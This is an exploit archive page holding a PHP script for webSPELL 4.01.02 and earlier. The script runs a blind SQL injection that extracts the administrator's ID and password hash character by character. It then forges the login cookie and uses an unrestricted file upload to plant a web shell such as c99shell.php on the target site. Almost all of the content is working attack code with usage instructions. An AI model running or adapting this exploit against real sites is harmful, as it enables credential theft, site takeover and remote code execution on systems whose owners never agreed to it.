exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

webspell-exec.txt

webspell-exec.txt
Posted Mar 8, 2007
Authored by DarkFig

webSPELL versions 4.01.02 and below remote code execution exploit.

tags | exploit, remote, code execution
SHA-256 | 29547bcb116a8a5c976676f6723cca0288b40635aecde39ddaec964f24859f18

webspell-exec.txt

Change Mirror Download
#!/usr/bin/php
<?php
/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

# Admin id: 1
# Admin hash: 7b24afc8bc80e548d66c4e7ff72171c5
# Logged in (ws_auth=1%3A7b24afc8bc80e548d66c4e7ff72171c5)
# Trying to upload the malicious file
# Done (http://localhost/webspell4.01.02/downloads/c99shell.php)
#
if($argc < 5)
{
print ("
------ webSPELL <= 4.01.02 Remote PHP Code Execution Exploit ------
-----------------------------------------------------------------------
PHP conditions: register_globals=On
Credits: DarkFig <gmdarkfig@gmail.com>
URL: http://www.acid-root.new.fr/
-----------------------------------------------------------------------
Usage: $argv[0] -url <> -file <> [Options]
Params: -url For example http://victim.com/webspell/
-file The file you wanna upload (c99shell.php...)
Options: -prefix Table prefix (default=webs)
-upmatch The match which returns TRUE for the upload
-sqlmatch The match which returns TRUE for the SQL injection
-proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
Example: $argv[0] -url http://localhost/webspell/ -file c99shell.php
-----------------------------------------------------------------------
");exit(1);
}

$url = getparam('url',1);
$file = getparam('file',1);
$prfix = (getparam('prefix')!='') ? getparam('prefix') : 'webs';
$match_upload = (getparam('upmatch')!='') ? getparam('upmatch') : '\;URL\=index\.php\?site\=files\&file\=';
$match_blindsql = (getparam('sqlmatch')!='') ? getparam('sqlmatch') : 'site\=profile\&id\=';
$proxy = getparam('proxy');
$authp = getparam('proxyauth');

$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);

print "\nAdmin id: ";
$userid = blind('userID');

print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));

print "\nLogged in (ws_auth=$userid%3A$passwd)";
$xpl->addcookie("ws_auth",$userid."%3A".$passwd);


# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
print "\nTrying to upload the malicious file";
$frmdt = array(frmdt_url => $url.'index.php?site=files&action=save',
"fileurl" => 1,
"upfile" => array(frmdt_filename => basename($file),
frmdt_content => file_get_contents($file)));

$xpl->formdata($frmdt);
if(preg_match("#$match_upload#si",$xpl->getcontent())) print "\nDone";
else print "\nFailed";
print " (${url}downloads/".basename($file).")\n";


# Simple blind SQL injection (register_globals=On)
#
# +members.php
# |
# 31. if($_GET['action']=="show") {
# 32. if($_GET['squadID']) {
# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';
# 34. }
# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER BY sort");
#
function blind($field)
{
global $prfix,$xpl,$url,$match_blindsql;
$d=0; $v='';

if(!eregi('p',$field)) { $b=47;$c=57; } # 0-9
else { $b=47;$c=70; } # 0-9a-z

while(TRUE)
{
$d++;
for($e=$b;$e<=$c;$e++)
{
if($e==47) $f='NULL';
else $f=$e;

$sql = "WHERE SUBSTR((SELECT $field FROM ${prfix}_user WHERE userID="
."(SELECT userID FROM ${prfix}_user_groups WHERE files=1 LIMIT 1)"
." LIMIT 1),$d,1)=CHAR($f)";

$xpl->get($url."index.php?site=members&action=show&getsquad=".urlencode($sql));
if(preg_match("#$match_blindsql#",$xpl->getcontent(),$matches))
{
if($e==47)
{
return $v;
}
else
{
print strtolower(chr($f));
$v .= chr($f);
break;
}
}
}
}
}

function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
}
if($opt) exit("\n-$param parameter required");
else return;
}

if(!function_exists('file_get_contents')) {
function file_get_contents($file)
{
$handle = fopen($file, "r");
$content = fread($fd, filesize($file));
fclose($handle);
return $content;
}
}

?>
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close